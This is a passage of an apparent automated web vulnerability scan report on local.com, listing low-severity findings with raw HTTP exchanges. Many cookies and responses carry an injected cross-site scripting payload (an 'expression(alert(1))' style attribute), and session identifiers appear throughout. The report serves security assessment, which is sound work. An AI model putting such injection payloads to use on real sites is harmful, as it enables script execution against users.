X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 131303
Date: Thu, 03 Feb 2011 16:50:45 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:44 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=New+York%2c+New+York&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 131303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>New York, NY Local Business S
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.36. http://www.local.com/terms/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /terms/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /terms/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 65330
Date: Thu, 03 Feb 2011 16:51:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 65330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Local.com Terms of Service</t
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.37. http://www.local.com/topics/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /topics/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /topics/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 36637
Date: Thu, 03 Feb 2011 16:50:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:14 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 36637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

5.38. http://www.local.com/topics/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /topics/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /topics/?topic=food&keyword=food HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 46766
Date: Thu, 03 Feb 2011 16:50:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:14 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=food; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 46766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

6. Source code disclosure  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.local.com
Path:   /business/v3/js/globalbusiness_3_5.js

Issue detail

The application appears to disclose some server-side source code written in ASP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /business/v3/js/globalbusiness_3_5.js?v=4034_19829 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=banks&cid=506c80ba%22style%3d%22x%3aexpression(alert(1))%2245503434253&client=ca-dp-r-mark03_3ph_js
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: "146be5643bfa9aaba91d3e4326dd137"
Server: Microsoft-IIS/7.5
X-CacheLevel: none
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=26246
Expires: Thu, 03 Feb 2011 23:17:16 GMT
Date: Thu, 03 Feb 2011 15:59:50 GMT
Connection: close
Content-Length: 477751


ic0n=function(parentObj){var _components=[];var _objid=new Date()*1;var root={OnDom:function(func){this.AddListener(window,"load",func);},OnLoad:function(func){this.AddListener(window,"load",func);},
...[SNIP]...
om.Toggle("listOptions","none");$_dom.Check("selAll");},OnLoad:function(){var that=pluck_account_reg4;if(that.debug)fb('acctRegDialog4: fn OnLoad');that.AddListeners();that.PrepareMailLinks();var CSk='<%#CloudSpongeConfig.Current.ApiKey %>';var CSp='<%#CloudSpongeConfig.Current.ApiSecret %>';setKeys(CSk,CSp);},PrepareMailLinks:function(){var that=pluck_account_reg4;if(that.debug)fb('acctRegDialog4: fn PrepareMailLinks');var mails=new Array("gmail","yahoo","msn","aol");for(var i=0;i<mails
...[SNIP]...

7. Cookie scoped to parent domain  previous  next
There are 43 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


7.1. http://www.local.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 28061
Date: Thu, 03 Feb 2011 16:50:12 GMT
Content-Length: 28061
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:12 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...

7.2. http://www.local.com/business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 77820
Date: Thu, 03 Feb 2011 16:38:56 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:55 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Business+Home|home|%2fbusiness%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 77820

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...

7.3. http://www.local.com/business/details/dallas-tx/amegy-bank-97648000/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/amegy-bank-97648000/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business/details/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 116008
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:01 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=local.com; expires=Thu, 03-Feb-2011 16:31:01 GMT; path=/
Content-Length: 116008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...

7.4. http://www.local.com/business/details/dallas-tx/cet-products-liquidators-9985416/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /business/details/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323183777121350; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 91928
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:00:47 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
